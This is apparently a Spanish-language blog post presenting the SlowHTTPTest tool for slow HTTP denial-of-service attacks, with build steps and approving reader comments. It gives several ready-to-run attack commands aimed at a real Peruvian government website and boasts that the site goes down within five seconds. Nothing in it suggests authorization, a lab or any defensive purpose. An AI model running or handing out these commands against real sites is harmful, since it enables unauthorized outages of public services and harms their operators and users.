SlowHTTPTest es una herramienta altamente configurable que simula algunos de denegacion de aplicaciónes en ataques de los servicios. Funciona en la mayoría de las plataformas Linux, OSX y Cygwin - una interfaz de medio ambiente y de línea de comandos Unix para Microsoft Windows.
Segun el autor:
Slowhttptest implementa ataques de bajo ancho de banda de la capa de aplicación de denegación de servicio, tales como slowloris, Slow HTTP POST, Slow (basados en TCP persistente temporizador de exploit) por el drenaje de la piscina conexiones concurrentes, así como ataque Apache Range Header haciendo el uso de memoria muy importante y uso de la CPU en el servidor.Ataques Slowloris y POST DoS HTTP son lento porque se basan en el hecho de que el protocolo HTTP, por diseño, requiere solicitudes para ser completamente recibidos por el servidor antes de ser procesadas. Si una solicitud HTTP no está completa, o si la velocidad de transferencia es muy baja, el servidor mantiene sus recursos ocupado esperando el resto de los datos. Si el servidor mantiene demasiados recursos ocupados, esto crea una denegación de servicio.
Esta herramienta es el envío de peticiones HTTP parciales, tratando de denegación de servicio desde el servidor HTTP de destino.
Instalacion :
root@kali:~ git clone https://github.com/shekyan/slowhttptest.gitroot@kali:~ cd slowhttptes
root@kali:~/slowhttptest# aptitude install libssl-dev libssl1.0.0=1.0.1e-2+deb7u14
root@kali:~/slowhttptest# ./configure
root@kali:~/slowhttptest# make
root@kali:~/slowhttptest# make install
root@kali:~/slowhttptest# cd src
ya en el directorio del slowhttptest , ingresaremos a la carpeta " src "
ahora ejecutaremos el slowhttptest :
Pondremos Este Scritp
./slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://www.peru.gob.pe/ -p 3
Como Verán ya esta Atacando y en 5 segundos la web esta completamente denegada en su totalidad como pueden apreciar en la parte donde dice "Service available"
Pero siempre es bueno darse una chequeada por los servicios como http://downforeveryoneorjustme.com
El Slowhttptest es una De las mas fuertes herramientas de DoS.
Otros tipos de ejecuciones:
./slowhttptest -c 1000 -X -g -o slow_read_stats -r 200 -w 513 -y 1024 -n 5 -z 32 -k 3 -u http://www.peru.gob.pe/ -p 3 ls
./slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://www.peru.gob.pe/ -p 3
./slowhttptest -R -u http://www.peru.gob.pe/ -t HEAD -c 1000 -a 10 -b 3000 -r 500
./slowhttptest -c 3000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.peru.gob.pe/ -x 10 -p
./slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://www.peru.gob.pe/ -x 24 -p 3
Espero les aya gustado este POST, mi persona siempre pensando en ustedes mis quieros lectores un saludo !
Buen Post Loka.
ResponderEliminarATT: MaldadSystem
muy bueno xd
ResponderEliminar